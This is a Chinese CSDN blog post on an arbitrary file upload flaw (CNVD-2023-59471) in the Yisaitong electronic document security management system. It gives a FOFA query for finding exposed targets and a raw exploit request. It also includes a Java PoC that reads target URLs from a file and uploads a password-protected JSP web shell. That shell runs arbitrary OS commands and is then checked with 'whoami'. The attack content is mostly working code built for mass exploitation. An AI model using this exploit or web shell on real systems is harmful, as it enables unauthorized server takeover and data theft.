亿某通电子文档安全管理系统任意文件上传

最新推荐文章于 2024-08-06 18:14:43 发布
最新推荐文章于 2024-08-06 18:14:43 发布
阅读量271 收藏
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135860593
版权

影响版本

<= V5.x
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8

网络空间测绘

fofa:app=“亿赛通-电子文档安全管理系统”

在这里插入图片描述

复现

image.png

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1


test

image.png
访问ip:port/tttT.jsp
poc脚本

package org.example.POC;

import com.github.kevinsawicki.http.HttpRequest;

import java.io.BufferedReader;
import java.io.FileReader;

public class CNVD_2023_59471 {
    public static void main(String[] args) {
        try (BufferedReader bufferedReader = new BufferedReader(new FileReader("D:\\TempData\\url.txt"))) {
            String line;
            while ((line = bufferedReader.readLine())  != null) {
                checkVuln(line);
            }
        } catch (Exception e) {
            System.out.println(e);
        }

    }
    public static void checkVuln(String URL){
        String attackUrl = URL+"/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM";
        String webShell_poc = "test";
        String webShell_addr = URL+"/tttT.jsp";
        String webShell_exp = "<% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>";
        try {
            int rs = HttpRequest.post(attackUrl).send(webShell_poc).connectTimeout(3000).code();
            String content = HttpRequest.get(webShell_addr).connectTimeout(6000).body();
            if(rs == 200){
                if(content.equals("test")){
                    System.out.println("[+]目标网站可能存在漏洞!!!");
                    System.out.println("[+]正在进行getShell,请等待!!!");
                    //Webshell上传
                    int rs2 = HttpRequest.post(attackUrl).send(webShell_exp).connectTimeout(3000).code();
                    if(rs2 == 200){
                        //Webshell验证
                        int command_rs = HttpRequest.get(webShell_addr+"?pwd=023&i=whoami").connectTimeout(3000).code();
                        if(command_rs == 200 ){
                            System.out.println("[+]Webshell上传成功,地址是"+webShell_addr+"?pwd=023&i=whoami");
                        }else {
                            System.out.println("[-]Webshell上传失败!!!可能存在AV被杀掉QWQ");
                        }
                    }else {
                        System.out.println("[-]Webshell上传失败!请更换重新更换尝试上传.....");
                    }

                }else {
                    System.out.println("[-]Webshell上传失败,请尝试其他JSP木马尝试!!!");
                }
            }else {
                System.out.println("[-]目标网站可能不存在漏洞!!!");
            }
        } catch (HttpRequest.HttpRequestException e) {
            System.out.println("[-]存在网络连接问题-_-!");
        }
    }
}
qq_36334672
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471
afei001
09-20 1064
亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可过此漏洞上传恶意后门文件,从而获取服务器权限。
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
nnn2188185的博客
11-23 360
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
亿赛通电子文档安全管理系统 文件上传
08-17 1204
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞,攻击者可利用该漏洞对服务器上传任意文件,进而控制服务器权限。 使用 帮助信息 $ java -jar CDGXStreamDeserRCE.jar 亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 usage: Options -d,--decode <arg> 密文解码 -e,--encode <arg> 加密XML反序列化payload -h,--help 打印帮助信息 -p,--proxy
亿赛通电子文档安全管理系统任意文件上传漏洞(2023-HW)
holyxp的博客
08-17 2711
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
CNVD-2021-30167漏洞复现到cnvd批量刷洞到后续利用完整经历
热门推荐
anlr2020的博客
09-07 1万+
记录一次挖漏洞的真实经历以及思路(本人文写的都偏傻瓜式,适合小白看,大神直接忽视) 首先新手没事可以多看看cnvd(国家信息安全漏洞贡献平台),链接在这https://www.cnvd.org.cn/,有一些最新的漏洞公告都会在这发布,你挖到的漏洞也可以提交到这,对你工作很有帮助。 某日无聊看看cnvd有没有新的漏洞公告,进入首页,点击热点关注-热点推荐,发现一堆最新的漏洞公告 看就看最新的,老漏洞被别人提交过的可能性更高,那么点第一个标题看看“用友NCBeanShell....漏洞” ..
CNVD-2021-49104——泛微E-Office文件上传漏洞
LiBai'S BLOG
11-28 8457
CNVD-2021-49104漏洞描述危害等级FOFA 语法影响版本漏洞复现修复建议 漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 危害等级 高危 文件上传可直接get webshell FOFA 语法 app="泛微-EOffice" 影响版本 泛微e-office V9.0 漏洞复现 构造请求上传文件即可 POST /general/index/U
亿某通电子文档安全管理系统 hiddenWatermark-uploadFile 文件上传漏洞
ZL_1618的博客
07-01 1428
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。Ⅰ、漏洞描述亿某新一代电子文档安全管理系统(简称:CDG)是一款融合文档加密、数据分类分级、访问控制、关联分析、大数据分析、智能识别等核心技术的综合性数据智能安全产品。
亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用.zip
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
多可海量云文件管理系统 v3.2.8.4.zip
07-13
多可海量云文档管理系统,借助创新的云技术,多可文档管理系统实现了文档存储云部署功能,它可以把海量的文档(超过50TB)存放于网络的任意一个磁盘阵列,同时可以支持数据库的异地服务。  这样,用户可以实现服务...
文档管理系统
07-11
文档管理系统是一种用于集中存储、管理和协作处理各类文档的软件工具。它常具有多种功能,以满足企业对文档安全、高效管理的需求。广州山海网络科技有限公司的文档管理系统具备以下几个核心特点: 1. **文档仓库*...
QYKCMS构造表单任意文件上传.pdf
04-22
本文将重点探讨在QYKCMS中存在的两个重要的安全漏洞——任意文件上传漏洞与任意文件读取漏洞。这两个漏洞均存在于QYKCMS的管理后台,可能被恶意攻击者利用来控制服务器权限、获取敏感信息等。 #### 二、环境搭建 ...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 455
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
水域救援设备,保护水域安全_鼎跃安全
最新发布
ShenZhenDingYue的博客
08-06 191
当然,水域安全问题不仅需要水域救援人员和设备的保障,还需要我们每个人进行水域安全知识的学习和培训,严格遵守当地的水域安全管理条例,在进行水域活动时,尽量结伴而行,保持联系。这些水域安全设备能够为我们水域活动提供保障,也可以提供水域救援的效率,降低安全风险,保障生命安全。与此同时,随着水域经济的蓬勃发展,各类水上及水下娱乐活动日益丰富多样,从刺激的冲浪、潜水到悠闲的划船、垂钓,无一不吸引着四面八方的游客纷至沓来,享受水上乐趣。绳子具有浮力,方便在水面使用,用于远距离救援,将绳子抛给落水者。
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 778
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 895
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
域名安全详解
TechEnthusiast的博客
08-06 94
域名安全是网络安全的重要组成部分,涉及多个方面。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 689
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值